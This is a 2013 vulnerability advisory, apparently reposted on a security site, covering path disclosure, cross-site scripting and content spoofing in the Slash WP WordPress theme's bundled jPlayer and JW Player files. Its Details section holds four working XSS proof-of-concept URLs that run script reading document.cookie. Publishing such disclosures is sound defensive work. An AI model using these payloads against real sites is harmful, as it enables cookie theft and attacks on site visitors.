WordPress Slash WP theme XSS and Content Spoofing vulnerabilities

2013.06.21
Credit: MustLive
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

I want to warn you about multiple vulnerabilities in Slash WP theme for WordPress. This is commercial theme for WP. These are Full path disclosure, Cross-Site Scripting and Content Spoofing vulnerabilities. ------------------------- Affected products: ------------------------- Vulnerable are all versions of Slash WP theme for WordPress. After I've informed developers about these vulnerabilities in April, they just thanked and promised to look at these vulnerabilities. There are no information if they fixed these holes already or when they are planning to do it. So all users of the theme should contact the developers for updates. ------------------------- Affected vendors: ------------------------- Dream-Theme http://dream-theme.com ---------- Details: ---------- Full path disclosure (WASC-13): http://site/wp-content/themes/slash-wp/ FPD in index.php and other php-files in plugin's folder and subfolders. Cross-Site Scripting (WASC-08): In the theme there are jPlayer 2.1.0 and JW Player 5.8.2011, about vulnerabilities in which I wrote earlier (in 2012 and 2013). http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)// http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)// http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?playerready=alert(document.cookie) http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg There is flash file of JW Player at some sites with this theme, but not at others. According to theme's description, theme has built-in support of JW Player, but it's not included in standard bundle (only jPlayer). But it can be installed separately and some web sites owners do it. Content Spoofing (WASC-12): About Content Spoofing vulnerabilities and about other XSS vulnerabilities in JW Player (http://securityvulns.com/docs28176.html) and in jPlayer (http://securityvulns.com/docs29316.html), you can read in corresponding advisories. ------------ Timeline: ------------ 2013.04.11 - announced at my site. 2013.04.12 - informed developers. 2013.06.20 - disclosed at my site (http://websecurity.com.ua/6440/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua

References:

http://websecurity.com.ua
http://securityvulns.com/docs29316.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top